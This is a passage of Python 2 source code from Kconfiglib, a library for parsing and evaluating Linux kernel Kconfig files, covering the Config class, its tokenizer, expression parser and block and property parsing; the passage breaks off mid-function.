Credits: Written by Ulf "Ulfalizer" Magnusson
Send bug reports, suggestions and other feedback to kconfiglib@gmail.com .
Don't wrestle with internal APIs. Tell me what you need and I might add it in a
safe way as a client API instead."""
# If you have Psyco installed (32-bit installations, Python <= 2.6 only),
# setting this to True (right here, not at runtime) might give a nice speedup.
# (22% faster for parsing arch/x86/Kconfig and 58% faster for evaluating all
# symbols in it without a .config on my Core Duo.)
use_psyco = False
import os
import re
import string
import sys
class Config():
"""Represents a Kconfig configuration, e.g. for i386 or ARM. This is the
set of symbols and other items appearing in the configuration together with
their values. Creating any number of Config objects -- including for
different architectures -- is safe; Kconfiglib has no global state."""
#
# Public interface
#
def __init__(self,
filename = "Kconfig",
base_dir = "$srctree",
print_warnings = True,
print_undef_assign = False):
"""Creates a new Config object, representing a Kconfig configuration.
Raises Kconfig_Syntax_Error on syntax errors.
filename (default: "Kconfig") -- The base Kconfig file of the
configuration. For the Linux kernel, this should usually be be
"Kconfig" from the top-level directory, as environment
variables will make sure the right Kconfig is included from
there (usually arch/<architecture>/Kconfig). If you are using
kconfiglib via 'make scriptconfig' the filename of the
correct Kconfig will be in sys.argv[1].
base_dir (default: "$srctree") -- The base directory relative to which
'source' statements within Kconfig files will work. For the
Linux kernel this should be the top-level directory of the
kernel tree. $-references to environment variables will be
expanded.
The environment variable 'srctree' is set by the Linux makefiles
to the top-level kernel directory. A default of "." would not
work if an alternative build directory is used.
print_warnings (default: True) -- Set to True if warnings related to
this configuration should be printed to stderr. This can
be changed later with Config.set_print_warnings(). It is
provided as a constructor argument since warnings might
be generated during parsing.
print_undef_assign (default: False) -- Set to True if informational
messages related to assignments to undefined symbols
should be printed to stderr for this configuration.
Can be changed later with
Config.set_print_undef_assign()."""
# The set of all symbols, indexed by name (a string)
self.syms = {}
# The set of all defined symbols in the configuration in the order they
# appear in the Kconfig files. This excludes the special symbols n, m,
# and y as well as symbols that are referenced but never defined.
self.kconfig_syms = []
# The set of all named choices (yes, choices can have names), indexed
# by name (a string)
self.named_choices = {}
def register_special_symbol(type, name, value):
sym = Symbol()
sym.is_special_ = True
sym.is_defined_ = True
sym.config = self
sym.name = name
sym.type = type
sym.cached_value = value
self.syms[name] = sym
return sym
# The special symbols n, m and y, used as shorthand for "n", "m" and
# "y"
self.n = register_special_symbol(TRISTATE, "n", "n")
self.m = register_special_symbol(TRISTATE, "m", "m")
self.y = register_special_symbol(TRISTATE, "y", "y")
# DEFCONFIG_LIST uses this
register_special_symbol(STRING, "UNAME_RELEASE", os.uname()[2])
# The symbol with "option defconfig_list" set, containing a list of
# default .config files
self.defconfig_sym = None
# See Symbol.get_(src)arch()
self.arch = os.environ.get("ARCH")
self.srcarch = os.environ.get("SRCARCH")
# See Config.__init__(). We need this for get_defconfig_filename().
self.srctree = os.environ.get("srctree")
if self.srctree is None:
self.srctree = "."
self.filename = filename
self.base_dir = _strip_trailing_slash(os.path.expandvars(base_dir))
# The 'mainmenu' text
self.mainmenu_text = None
# The filename of the most recently loaded .config file
self.config_filename = None
# The textual header of the most recently loaded .config, uncommented
self.config_header = None
self.print_warnings = print_warnings
self.print_undef_assign = print_undef_assign
# Lists containing all choices, menus and comments in the configuration
self.choices = []
self.menus = []
self.comments = []
# For parsing routines that stop when finding a line belonging to a
# different construct, these holds that line and the tokenized version
# of that line. The purpose is to avoid having to re-tokenize the line,
# which is inefficient and causes problems when recording references to
# symbols.
self.end_line = None
self.end_line_tokens = None
# See the comment in _parse_expr().
self.parse_expr_cur_sym_or_choice = None
self.parse_expr_line = None
self.parse_expr_filename = None
self.parse_expr_linenr = None
self.parse_expr_transform_m = None
# Parse the Kconfig files
self.top_block = self._parse_file(filename, None, None, None)
# Build Symbol.dep for all symbols
self._build_dep()
def load_config(self, filename, replace = True):
"""Loads symbol values from a file in the familiar .config format.
Equivalent to calling Symbol.set_user_value() to set each of the
values.
filename -- The .config file to load. $-references to environment
variables will be expanded. For scripts to work even
when an alternative build directory is used with the
Linux kernel, you need to refer to the top-level kernel
directory with "$srctree".
replace (default: True) -- True if the configuration should replace
the old configuration; False if it should add to it."""
def warn_override(filename, linenr, name, old_user_val, new_user_val):
self._warn("overriding the value of {0}. "
'Old value: "{1}", new value: "{2}".'
.format(name, old_user_val, new_user_val),
filename,
linenr)
filename = os.path.expandvars(filename)
# Put this first so that a missing file doesn't screw up our state
line_feeder = _FileFeed(_get_lines(filename), filename)
self.config_filename = filename
# Invalidate everything. This is usually faster than finding the
# minimal set of symbols that needs to be invalidated, as nearly all
# symbols will tend to be affected anyway.
if replace:
self.unset_user_values()
else:
self._invalidate_all()
# Read header
self.config_header = None
def is_header_line(line):
return line.startswith("#") and \
not unset_re.match(line)
first_line = line_feeder.get_next()
if first_line is None:
return
if not is_header_line(first_line):
line_feeder.go_back()
else:
self.config_header = first_line[1:]
# Read remaining header lines
while 1:
line = line_feeder.get_next()
if line is None:
break
if not is_header_line(line):
line_feeder.go_back()
break
self.config_header += line[1:]
# Remove trailing newline
if self.config_header.endswith("\n"):
self.config_header = self.config_header[:-1]
# Read assignments
filename = line_feeder.get_filename()
while 1:
line = line_feeder.get_next()
if line is None:
return
linenr = line_feeder.get_linenr()
line = line.strip()
set_re_match = set_re.match(line)
if set_re_match:
name, val = set_re_match.groups()
# The unescaping producedure below should be safe since " can
# only appear as \" inside the string
val = _strip_quotes(val, line, filename, linenr)\
.replace('\\"', '"').replace("\\\\", "\\")
if name in self.syms:
sym = self.syms[name]
old_user_val = sym.user_val
if old_user_val is not None:
warn_override(filename, linenr, name, old_user_val, val)
if sym.is_choice_symbol_:
user_mode = sym.parent.user_mode
if user_mode is not None and user_mode != val:
self._warn("assignment to {0} changes mode of containing "
'choice from "{1}" to "{2}".'
.format(name, val, user_mode),
filename,
linenr)
sym._set_user_value_no_invalidate(val, True)
else:
self._undef_assign('attempt to assign the value "{0}" to the '
"undefined symbol {1}."
.format(val, name),
filename,
linenr)
else:
unset_re_match = unset_re.match(line)
if unset_re_match:
name = unset_re_match.group(1)
if name in self.syms:
sym = self.syms[name]
old_user_val = sym.user_val
if old_user_val is not None:
warn_override(filename, linenr, name, old_user_val, "n")
sym._set_user_value_no_invalidate("n", True)
def write_config(self, filename, header = None):
"""Writes out symbol values in the familiar .config format.
filename -- The filename under which to save the configuration.
header (default: None) -- A textual header that will appear at the
beginning of the file, with each line commented out
automatically. None means no header."""
# already_written is set when _make_conf() is called on a symbol, so
# that symbols defined in multiple locations only get one entry in the
# .config. We need to reset it prior to writing out a new .config.
for sym in self.syms.itervalues():
sym.already_written = False
with open(filename, "w") as f:
# Write header
if header is not None:
f.write(_comment(header))
f.write("\n")
# Write configuration.
# (You'd think passing a list around to all the nodes and appending
# to it to avoid copying would be faster, but it's actually a lot
# slower with PyPy, and about as fast with Python. Passing the file
# around is slower too.)
f.write("\n".join(self.top_block._make_conf()))
f.write("\n")
def get_kconfig_filename(self):
"""Returns the name of the (base) kconfig file this configuration was
loaded from."""
return self.filename
def get_arch(self):
"""Returns the value the environment variable ARCH had at the time the
Config instance was created, or None if ARCH was not set. For the
kernel, this corresponds to the architecture being built for, with
values such as "i386" or "mips"."""
return self.arch
def get_srcarch(self):
"""Returns the value the environment variable SRCARCH had at the time
the Config instance was created, or None if SRCARCH was not set. For
the kernel, this corresponds to the arch/ subdirectory containing
architecture-specific source code."""
return self.srcarch
def get_srctree(self):
"""Returns the value the environment variable srctree had at the time
the Config instance was created, or None if srctree was not defined.
This variable points to the source directory and is used when building
in a separate directory."""
return self.srctree
def get_config_filename(self):
"""Returns the name of the most recently loaded configuration file, or
None if no configuration has been loaded."""
return self.config_filename
def get_mainmenu_text(self):
"""Returns the text of the 'mainmenu' statement (with $-references to
symbols replaced by symbol values), or None if the configuration has no
'mainmenu' statement."""
return None if self.mainmenu_text is None else \
self._expand_sym_refs(self.mainmenu_text)
def get_defconfig_filename(self):
"""Returns the name of the defconfig file, which is the first existing
file in the list given in a symbol having 'option defconfig_list' set.
$-references to symbols will be expanded ("$FOO bar" -> "foo bar" if
FOO has the value "foo"). Returns None in case of no defconfig file.
Setting 'option defconfig_list' on multiple symbols currently results
in undefined behavior.
If the environment variable 'srctree' was set when the Config was
created, get_defconfig_filename() will first look relative to that
directory before looking in the current directory; see
Config.__init__()."""
if self.defconfig_sym is None:
return None
for (filename, cond_expr) in self.defconfig_sym.def_exprs:
if self._eval_expr(cond_expr) == "y":
filename = self._expand_sym_refs(filename)
# We first look in $srctree. os.path.join() won't work here as
# an absolute path in filename would override $srctree.
srctree_filename = os.path.normpath(self.srctree + "/" + filename)
if os.path.exists(srctree_filename):
return srctree_filename
if os.path.exists(filename):
return filename
return None
def get_symbol(self, name):
"""Returns the symbol with name 'name', or None if no such symbol
appears in the configuration. An alternative shorthand is conf[name],
where conf is a Config instance, though that will instead raise
KeyError if the symbol does not exist."""
return self.syms.get(name)
def get_top_level_items(self):
"""Returns a list containing the items (symbols, menus, choice
statements and comments) at the top level of the configuration -- that
is, all items that do not appear within a menu or choice. The items
appear in the same order as within the configuration."""
return self.top_block.get_items()
def get_symbols(self, all_symbols = True):
"""Returns a list of symbols from the configuration. An alternative for
iterating over all defined symbols (in the order of definition) is
for sym in config:
...
which relies on Config implementing __iter__() and is equivalent to
for sym in config.get_symbols(False):
...
all_symbols (default: True) -- If True, all symbols - including special
and undefined symbols - will be included in the result, in
an undefined order. If False, only symbols actually defined
and not merely referred to in the configuration will be
included in the result, and will appear in the order that
they are defined within the Kconfig configuration files."""
return self.syms.values() if all_symbols else self.kconfig_syms
def get_choices(self):
"""Returns a list containing all choice statements in the
configuration, in the order they appear in the Kconfig files."""
return self.choices
def get_menus(self):
"""Returns a list containing all menus in the configuration, in the
order they appear in the Kconfig files."""
return self.menus
def get_comments(self):
"""Returns a list containing all comments in the configuration, in the
order they appear in the Kconfig files."""
return self.comments
def eval(self, s):
"""Returns the value of the expression 's' -- where 's' is represented
as a string -- in the context of the configuration. Raises
Kconfig_Syntax_Error if syntax errors are detected in 's'.
For example, if FOO and BAR are tristate symbols at least one of which
has the value "y", then config.eval("y && (FOO || BAR)") => "y"
This functions always yields a tristate value. To get the value of
non-bool, non-tristate symbols, use Symbol.get_value().
The result of this function is consistent with how evaluation works for
conditional expressions in the configuration as well as in the C
implementation. "m" and m are rewritten as '"m" && MODULES' and 'm &&
MODULES', respectively, and a result of "m" will get promoted to "y" if
we're running without modules."""
return self._eval_expr(self._parse_expr(self._tokenize(s, True), # Feed
None, # Current symbol or choice
s)) # line
def get_config_header(self):
"""Returns the (uncommented) textual header of the .config file most
recently loaded with load_config(). Returns None if no .config file has
been loaded or if the most recently loaded .config file has no header.
The header comprises all lines up to but not including the first line
that either
1. Does not start with "#"
2. Has the form "# CONFIG_FOO is not set."
"""
return self.config_header
def get_base_dir(self):
"""Returns the base directory relative to which 'source' statements
will work, passed as an argument to Config.__init__()."""
return self.base_dir
def set_print_warnings(self, print_warnings):
"""Determines whether warnings related to this configuration (for
things like attempting to assign illegal values to symbols with
Symbol.set_user_value()) should be printed to stderr.
print_warnings -- True if warnings should be
printed, otherwise False."""
self.print_warnings = print_warnings
def set_print_undef_assign(self, print_undef_assign):
"""Determines whether informational messages related to assignments to
undefined symbols should be printed to stderr for this configuration.
print_undef_assign -- If True, such messages will be printed."""
self.print_undef_assign = print_undef_assign
def __getitem__(self, key):
"""Returns the symbol with name 'name'. Raises KeyError if the symbol
does not appear in the configuration."""
return self.syms[key]
def __iter__(self):
"""Convenience function for iterating over the set of all defined
symbols in the configuration, used like
for sym in conf:
...
The iteration happens in the order of definition within the Kconfig
configuration files. Symbols only referred to but not defined will not
be included, nor will the special symbols n, m, and y. If you want to
include such symbols as well, see config.get_symbols()."""
return iter(self.kconfig_syms)
def unset_user_values(self):
"""Resets the values of all symbols, as if Config.load_config() or
Symbol.set_user_value() had never been called."""
for sym in self.syms.itervalues():
sym._unset_user_value_no_recursive_invalidate()
def __str__(self):
"""Returns a string containing various information about the Config."""
return _sep_lines("Configuration",
"File : " + self.filename,
"Base directory : " + self.base_dir,
"Value of $ARCH at creation time : " +
("(not set)" if self.arch is None else self.arch),
"Value of $SRCARCH at creation time : " +
("(not set)" if self.srcarch is None else self.srcarch),
"Source tree (derived from $srctree;",
"defaults to '.' if $srctree isn't set) : " + self.srctree,
"Most recently loaded .config : " +
("(no .config loaded)" if self.config_filename is None else
self.config_filename),
"Print warnings : " +
bool_str[self.print_warnings],
"Print assignments to undefined symbols : " +
bool_str[self.print_undef_assign])
#
# Private methods
#
def _invalidate_all(self):
for sym in self.syms.itervalues():
sym._invalidate()
def _tokenize(self,
s,
for_eval = False,
filename = None,
linenr = None):
"""Returns a _Feed instance containing tokens derived from the string
's'. Registers any new symbols encountered (via _sym_lookup()).
(I experimented with a pure regular expression implementation, but it
came out slower, less readable, and wouldn't have been as flexible.)
for_eval -- True when parsing an expression for a call to
Config.eval(), in which case we should not treat the first
token specially nor register new symbols."""
s = s.lstrip()
if s == "" or s[0] == "#":
return _Feed([])
if for_eval:
i = 0 # The current index in the string being tokenized
previous = None # The previous token seen
tokens = []
else:
# The initial word on a line is parsed specially. Let
# command_chars = [A-Za-z0-9_]. Then
# - leading non-command_chars characters on the line are ignored, and
# - the first token consists the following one or more command_chars
# characters.
# This is why things like "----help--" are accepted.
initial_token_match = initial_token_re.match(s)
if initial_token_match is None:
return _Feed([])
# The current index in the string being tokenized
i = initial_token_match.end()
keyword = keywords.get(initial_token_match.group(1))
if keyword is None:
# We expect a keyword as the first token
_tokenization_error(s, len(s), filename, linenr)
if keyword == T_HELP:
# Avoid junk after "help", e.g. "---", being registered as a
# symbol
return _Feed([T_HELP])
tokens = [keyword]
previous = keyword
# _tokenize() is a hotspot during parsing, and this speeds things up a
# bit
strlen = len(s)
append = tokens.append
# Main tokenization loop. (Handles tokens past the first one.)
while i < strlen:
# Test for an identifier/keyword preceded by whitespace first; this
# is the most common case.
id_keyword_match = id_keyword_re.match(s, i)
if id_keyword_match:
# We have an identifier or keyword. The above also stripped any
# whitespace for us.
name = id_keyword_match.group(1)
# Jump past it
i = id_keyword_match.end()
# Keyword?
keyword = keywords.get(name)
if keyword is not None:
append(keyword)
# What would ordinarily be considered a name is treated as a
# string after certain tokens.
elif previous in string_lex:
append(name)
else:
# We're dealing with a symbol. _sym_lookup() will take care
# of allocating a new Symbol instance if it's the first
# time we see it.
sym = self._sym_lookup(name, not for_eval)
if previous == T_CONFIG or previous == T_MENUCONFIG:
# If the previous token is T_(MENU)CONFIG
# ("(menu)config"), we're tokenizing the first line of
# a symbol definition, and should remember this as a
# location where the symbol is defined.
sym.def_locations.append((filename, linenr))
else:
# Otherwise, it's a reference to the symbol
sym.ref_locations.append((filename, linenr))
append(sym)
else:
# This restrips whitespace that could have been stripped in the
# regex above, but it's worth it since identifiers/keywords are
# more common
s = s[i:].lstrip()
if s == "":
break
strlen = len(s)
i = 0
c = s[0]
# String literal (constant symbol)
if c == '"' or c == "'":
i += 1
if "\\" in s:
# Slow path: This could probably be sped up, but it's a
# very unusual case anyway.
quote = c
value = ""
while 1:
if i >= strlen:
_tokenization_error(s, strlen, filename,
linenr)
c = s[i]
if c == quote:
break
if c == "\\":
if i + 1 >= strlen:
_tokenization_error(s, strlen, filename,
linenr)
value += s[i + 1]
i += 2
else:
value += c
i += 1
i += 1
append(value)
else:
# Fast path: If the string contains no backslashes (almost
# always) we can simply look for the matching quote.
end = s.find(c, i)
if end == -1:
_tokenization_error(s, strlen, filename, linenr)
append(s[i:end])
i = end + 1
elif c == "&":
if i + 1 >= strlen:
# Invalid characters are ignored
continue
if s[i + 1] != "&":
# Invalid characters are ignored
i += 1
continue
append(T_AND)
i += 2
elif c == "|":
if i + 1 >= strlen:
# Invalid characters are ignored
continue
if s[i + 1] != "|":
# Invalid characters are ignored
i += 1
continue
append(T_OR)
i += 2
elif c == "!":
if i + 1 >= strlen:
_tokenization_error(s, strlen, filename, linenr)
if s[i + 1] == "=":
append(T_UNEQUAL)
i += 2
else:
append(T_NOT)
i += 1
elif c == "=":
append(T_EQUAL)
i += 1
elif c == "(":
append(T_OPEN_PAREN)
i += 1
elif c == ")":
append(T_CLOSE_PAREN)
i += 1
elif c == "#":
break
else:
# Invalid characters are ignored
i += 1
continue
previous = tokens[-1]
return _Feed(tokens)
#
# Parsing
#
# Expression grammar:
#
# <expr> -> <symbol>
# <symbol> '=' <symbol>
# <symbol> '!=' <symbol>
# '(' <expr> ')'
# '!' <expr>
# <expr> '&&' <expr>
# <expr> '||' <expr>
def _parse_expr(self,
feed,
cur_sym_or_choice,
line,
filename = None,
linenr = None,
transform_m = True):
"""Parse an expression from the tokens in 'feed' using a simple
top-down approach. The result has the form (<operator>, <list
containing parsed operands>).
feed -- _Feed instance containing the tokens for the expression.
cur_sym_or_choice -- The symbol or choice currently being parsed, or
None if we're not parsing a symbol or choice.
Used for recording references to symbols.
line -- The line containing the expression being parsed.
filename (default: None) -- The file containing the expression.
linenr (default: None) -- The line number containing the expression.
transform_m (default: False) -- Determines if 'm' should be rewritten to
'm && MODULES' -- see
parse_val_and_cond()."""
# Use instance variables to avoid having to pass these as arguments
# through the top-down parser in _parse_expr_2(), which is tedious and
# obfuscates the code. A profiler run shows no noticeable performance
# difference.
self.parse_expr_cur_sym_or_choice = cur_sym_or_choice
self.parse_expr_line = line
self.parse_expr_filename = filename
self.parse_expr_linenr = linenr
self.parse_expr_transform_m = transform_m
return self._parse_expr_2(feed)
def _parse_expr_2(self, feed):
or_terms = [self._parse_or_term(feed)]
# Keep parsing additional terms while the lookahead is '||'
while feed.check(T_OR):
or_terms.append(self._parse_or_term(feed))
return or_terms[0] if len(or_terms) == 1 else (OR, or_terms)
def _parse_or_term(self, feed):
and_terms = [self._parse_factor(feed)]
# Keep parsing additional terms while the lookahead is '&&'
while feed.check(T_AND):
and_terms.append(self._parse_factor(feed))
return and_terms[0] if len(and_terms) == 1 else (AND, and_terms)
def _parse_factor(self, feed):
if feed.check(T_OPEN_PAREN):
expr_parse = self._parse_expr_2(feed)
if not feed.check(T_CLOSE_PAREN):
_parse_error(self.parse_expr_line,
"missing end parenthesis.",
self.parse_expr_filename,
self.parse_expr_linenr)
return expr_parse
if feed.check(T_NOT):
return (NOT, self._parse_factor(feed))
sym_or_string = feed.get_next()
if not isinstance(sym_or_string, (Symbol, str)):
_parse_error(self.parse_expr_line,
"malformed expression.",
self.parse_expr_filename,
self.parse_expr_linenr)
if self.parse_expr_cur_sym_or_choice is not None and \
isinstance(sym_or_string, Symbol):
self.parse_expr_cur_sym_or_choice.referenced_syms.add(sym_or_string)
next_token = feed.peek_next()
# For conditional expressions ('depends on <expr>', '... if <expr>',
# etc.), "m" and m are rewritten to "m" && MODULES.
if next_token != T_EQUAL and next_token != T_UNEQUAL:
if self.parse_expr_transform_m and (sym_or_string is self.m or
sym_or_string == "m"):
return (AND, ["m", self._sym_lookup("MODULES")])
return sym_or_string
relation = EQUAL if (feed.get_next() == T_EQUAL) else UNEQUAL
sym_or_string_2 = feed.get_next()
if self.parse_expr_cur_sym_or_choice is not None and \
isinstance(sym_or_string_2, Symbol):
self.parse_expr_cur_sym_or_choice.referenced_syms.add(sym_or_string_2)
if sym_or_string is self.m:
sym_or_string = "m"
if sym_or_string_2 is self.m:
sym_or_string_2 = "m"
return (relation, sym_or_string, sym_or_string_2)
def _parse_file(self, filename, parent, deps, visible_if_deps, res = None):
"""Parse the Kconfig file 'filename'. The result is a _Block with all
items from the file. See _parse_block() for the meaning of the
parameters."""
line_feeder = _FileFeed(_get_lines(filename), filename)
return self._parse_block(line_feeder, None, parent, deps, visible_if_deps, res)
def _parse_block(self, line_feeder, end_marker, parent, deps,
visible_if_deps = None, res = None):
"""Parses a block, which is the contents of either a file or an if,
menu, or choice statement. The result is a _Block with the items from
the block.
end_marker -- The token that ends the block, e.g. T_ENDIF ("endif") for
if's. None for files.
parent -- The enclosing menu, choice or if, or None if we're at the top
level.
deps -- Dependencies from enclosing menus, choices and if's.
visible_if_deps (default: None) -- 'visible if' dependencies from
enclosing menus.
res (default: None) -- The _Block to add items to. If None, a new
_Block is created to hold the items."""
block = _Block() if res is None else res
filename = line_feeder.get_filename()
while 1:
# Do we already have a tokenized line that we determined wasn't
# part of whatever we were parsing earlier? See comment in
# Config.__init__().
if self.end_line is not None:
assert self.end_line_tokens is not None
tokens = self.end_line_tokens
tokens.go_to_start()
line = self.end_line
linenr = line_feeder.get_linenr()
self.end_line = None
self.end_line_tokens = None
else:
line = line_feeder.get_next()
if line is None:
if end_marker is not None:
raise Kconfig_Syntax_Error, (
"Unexpected end of file {0}."
.format(line_feeder.get_filename()))
return block
linenr = line_feeder.get_linenr()
tokens = self._tokenize(line, False, filename, linenr)
if tokens.is_empty():
continue
t0 = tokens.get_next()
# Have we reached the end of the block?
if t0 == end_marker:
return block
if t0 == T_CONFIG or t0 == T_MENUCONFIG:
# The tokenizer will automatically allocate a new Symbol object
# for any new names it encounters, so we don't need to worry
# about that here.
sym = tokens.get_next()
# Symbols defined in multiple places get the parent of their
# first definition. However, for symbols whose parents are choice
# statements, the choice statement takes precedence.
if not sym.is_defined_ or isinstance(parent, Choice):
sym.parent = parent
sym.is_defined_ = True
self.kconfig_syms.append(sym)
block.add_item(sym)
self._parse_properties(line_feeder, sym, deps, visible_if_deps)
elif t0 == T_MENU:
menu = Menu()
self.menus.append(menu)
menu.config = self
menu.parent = parent
menu.title = tokens.get_next()
menu.filename = filename
menu.linenr = linenr
# Parse properties and contents
self._parse_properties(line_feeder, menu, deps, visible_if_deps)
menu.block = self._parse_block(line_feeder,
T_ENDMENU,
menu,
menu.dep_expr,
_make_and(visible_if_deps,
menu.visible_if_expr))
block.add_item(menu)
elif t0 == T_IF:
# If statements are treated as syntactic sugar for adding
# dependencies to enclosed items and do not have an explicit
# object representation.
dep_expr = self._parse_expr(tokens, None, line, filename, linenr)
self._parse_block(line_feeder,
T_ENDIF,
parent,
_make_and(dep_expr, deps),
visible_if_deps,
block) # Add items to the same block
elif t0 == T_CHOICE:
# We support named choices
already_defined = False
name = None
if len(tokens) > 1 and isinstance(tokens[1], str):
name = tokens[1]
already_defined = name in self.named_choices
if already_defined:
choice = self.named_choices[name]
else:
choice = Choice()
self.choices.append(choice)
if name is not None:
choice.name = name
self.named_choices[name] = choice
choice.config = self
choice.parent = parent
choice.def_locations.append((filename, linenr))
# Parse properties and contents
self._parse_properties(line_feeder, choice, deps, visible_if_deps)
choice.block = self._parse_block(line_feeder,
T_ENDCHOICE,
choice,
None,
visible_if_deps)
choice._determine_actual_symbols()
# If no type is set for the choice, its type is that of the first
# choice item
if choice.type == UNKNOWN:
for item in choice.get_symbols():
if item.type != UNKNOWN:
choice.type = item.type
break
# Each choice item of UNKNOWN type gets the type of the choice
for item in choice.get_symbols():
if item.type == UNKNOWN:
item.type = choice.type
# For named choices defined in multiple locations, only record
# at the first definition
if not already_defined:
block.add_item(choice)
elif t0 == T_COMMENT:
comment = Comment()
comment.config = self
comment.parent = parent
comment.filename = filename
comment.linenr = linenr
comment.text = tokens.get_next()
self._parse_properties(line_feeder, comment, deps, visible_if_deps)
block.add_item(comment)
self.comments.append(comment)
elif t0 == T_SOURCE:
kconfig_file = tokens.get_next()
exp_kconfig_file = self._expand_sym_refs(kconfig_file)
f = os.path.join(self.base_dir, exp_kconfig_file)
if not os.path.exists(f):
raise IOError, ('{0}:{1}: sourced file "{2}" (expands to\n'
'"{3}") not found. Perhaps base_dir\n'
'(argument to Config.__init__(), currently\n'
'"{4}") is set to the wrong value.'
.format(filename,
linenr,
kconfig_file,
exp_kconfig_file,
self.base_dir))
# Add items to the same block
self._parse_file(f, parent, deps, visible_if_deps, block)
elif t0 == T_MAINMENU:
text = tokens.get_next()
if self.mainmenu_text is not None:
self._warn("overriding 'mainmenu' text. "
'Old value: "{0}", new value: "{1}".'
.format(self.mainmenu_text, text),
filename,
linenr)
self.mainmenu_text = text
else:
_parse_error(line, "unrecognized construct.", filename, linenr)
def _parse_properties(self, line_feeder, stmt, deps, visible_if_deps):
"""Parsing of properties for symbols, menus, choices, and comments."""
def parse_val_and_cond(tokens, line, filename, linenr):
"""Parses '<expr1> if <expr2>' constructs, where the 'if' part is
optional. Returns a tuple containing the parsed expressions, with
None as the second element if the 'if' part is missing."""
val = self._parse_expr(tokens, stmt, line, filename, linenr, False)
if tokens.check(T_IF):
return (val, self._parse_expr(tokens, stmt, line, filename, linenr))
return (val, None)
# In case the symbol is defined in multiple locations, we need to
# remember what prompts, defaults, and selects are new for this
# definition, as "depends on" should only apply to the local
# definition.
new_prompt = None
new_def_exprs = []
new_selects = []
# Dependencies from 'depends on' statements
depends_on_expr = None
while 1:
line = line_feeder.get_next()
if line is None:
break
filename = line_feeder.get_filename()
linenr = line_feeder.get_linenr()
tokens = self._tokenize(line, False, filename, linenr)
if tokens.is_empty():
continue
t0 = tokens.get_next()
if t0 == T_HELP:
# Find first non-empty line and get its indentation
line_feeder.remove_while(str.isspace)
line = line_feeder.get_next()
if line is None:
stmt.help = ""
break
indent = _indentation(line)
# If the first non-empty lines has zero indent, there is no
# help text
if indent == 0:
stmt.help = ""
line_feeder.go_back()
break
help_lines = [_deindent(line, indent)]
# The help text goes on till the first non-empty line with less
# indent
while 1:
line = line_feeder.get_next()
if (line is None) or \
(not line.isspace() and _indentation(line) < indent):
stmt.help = "".join(help_lines)
break
help_lines.append(_deindent(line, indent))
if line is None:
break
line_feeder.go_back()
elif t0 == T_PROMPT:
# 'prompt' properties override each other within a single
# definition of a symbol, but additional prompts can be added
# by defining the symbol multiple times; hence 'new_prompt'
# instead of 'prompt'.
new_prompt = parse_val_and_cond(tokens, line, filename, linenr)
elif t0 == T_DEFAULT:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_DEPENDS:
if not tokens.check(T_ON):
_parse_error(line, 'expected "on" after "depends".', filename, linenr)
parsed_deps = self._parse_expr(tokens, stmt, line, filename, linenr)
if isinstance(stmt, (Menu, Comment)):
stmt.dep_expr = _make_and(stmt.dep_expr, parsed_deps)
else:
depends_on_expr = _make_and(depends_on_expr, parsed_deps)
elif t0 == T_VISIBLE:
if not tokens.check(T_IF):
_parse_error(line, 'expected "if" after "visible".', filename, linenr)
if not isinstance(stmt, Menu):
_parse_error(line,
"'visible if' is only valid for menus.",
filename,
linenr)
parsed_deps = self._parse_expr(tokens, stmt, line, filename, linenr)
stmt.visible_if_expr = _make_and(stmt.visible_if_expr, parsed_deps)
elif t0 == T_SELECT:
target = tokens.get_next()
stmt.referenced_syms.add(target)
stmt.selected_syms.add(target)
if tokens.check(T_IF):
new_selects.append((target,
self._parse_expr(tokens, stmt, line, filename, linenr)))
else:
new_selects.append((target, None))
elif t0 in (T_BOOL, T_TRISTATE, T_INT, T_HEX, T_STRING):
stmt.type = token_to_type[t0]
if len(tokens) > 1:
new_prompt = parse_val_and_cond(tokens, line, filename, linenr)
elif t0 == T_RANGE:
lower = tokens.get_next()
upper = tokens.get_next()
stmt.referenced_syms.add(lower)
stmt.referenced_syms.add(upper)
if tokens.check(T_IF):
stmt.ranges.append((lower, upper,
self._parse_expr(tokens, stmt, line, filename, linenr)))
else:
stmt.ranges.append((lower, upper, None))
elif t0 == T_DEF_BOOL:
stmt.type = BOOL
if len(tokens) > 1:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_DEF_TRISTATE:
stmt.type = TRISTATE
if len(tokens) > 1:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_OPTIONAL:
if not isinstance(stmt, Choice):
_parse_error(line,
'"optional" is only valid for choices.',
filename,
linenr)
stmt.optional = True
elif t0 == T_OPTION:
if tokens.check(T_ENV) and tokens.check(T_EQUAL):
env_var = tokens.get_next()
stmt.is_special_ = True
stmt.is_from_env = True
if env_var not in os.environ:
self._warn("""
The symbol {0} references the non-existent environment variable {1} and will
get the empty string as its value.
If you're using kconfiglib via 'make (i)scriptconfig' it should have set up the
environment correctly for you. If you still got this message, that might be an
error, and you should e-mail kconfiglib@gmail.com.
.""" .format(stmt.name, env_var),
filename,
linenr)
stmt.cached_value = ""
else:
stmt.cached_value = os.environ[env_var]
elif tokens.check(T_DEFCONFIG_LIST):
self.defconfig_sym = stmt
elif tokens.check(T_MODULES):
self._warn("the 'modules' option is not supported. "
"Let me know if this is a problem for you; "
"it shouldn't be that hard to implement.",
filename,
linenr)
else:
_parse_error(line, "unrecognized option.", filename, linenr)
else:
# See comment in Config.__init__()
self.end_line = line
self.end_line_tokens = tokens
break
# Propagate dependencies from enclosing menus and if's.
# For menus and comments..
if isinstance(stmt, (Menu, Comment)):
stmt.orig_deps = stmt.dep_expr
stmt.deps_from_containing = deps
stmt.dep_expr = _make_and(stmt.dep_expr, deps)
stmt.all_referenced_syms = \
stmt.referenced_syms | _get_expr_syms(deps)
# For symbols and choices..
else:
# See comment for 'menu_dep'
stmt.menu_dep = depends_on_expr
# Propagate dependencies specified with 'depends on' to any new
# default expressions, prompts, and selections. ("New" since a
# symbol might be defined in multiple places and the dependencies
# should only apply to the local definition.)
new_def_exprs = [(val_expr, _make_and(cond_expr, depends_on_expr))
for (val_expr, cond_expr) in new_def_exprs]
new_selects = [(target, _make_and(cond_expr, depends_on_expr))
for (target, cond_expr) in new_selects]
if new_prompt is not None:
prompt, cond_expr = new_prompt
# 'visible if' dependencies from enclosing menus get propagated
# to prompts
if visible_if_deps is not None:
cond_expr = _make_and(cond_expr, visible_if_deps)
new_prompt = (prompt, _make_and(cond_expr, depends_on_expr))
# We save the original expressions -- before any menu and if
# conditions have been propagated -- so these can be retrieved
# later.
stmt.orig_def_exprs.extend(new_def_exprs)
if new_prompt is not None:
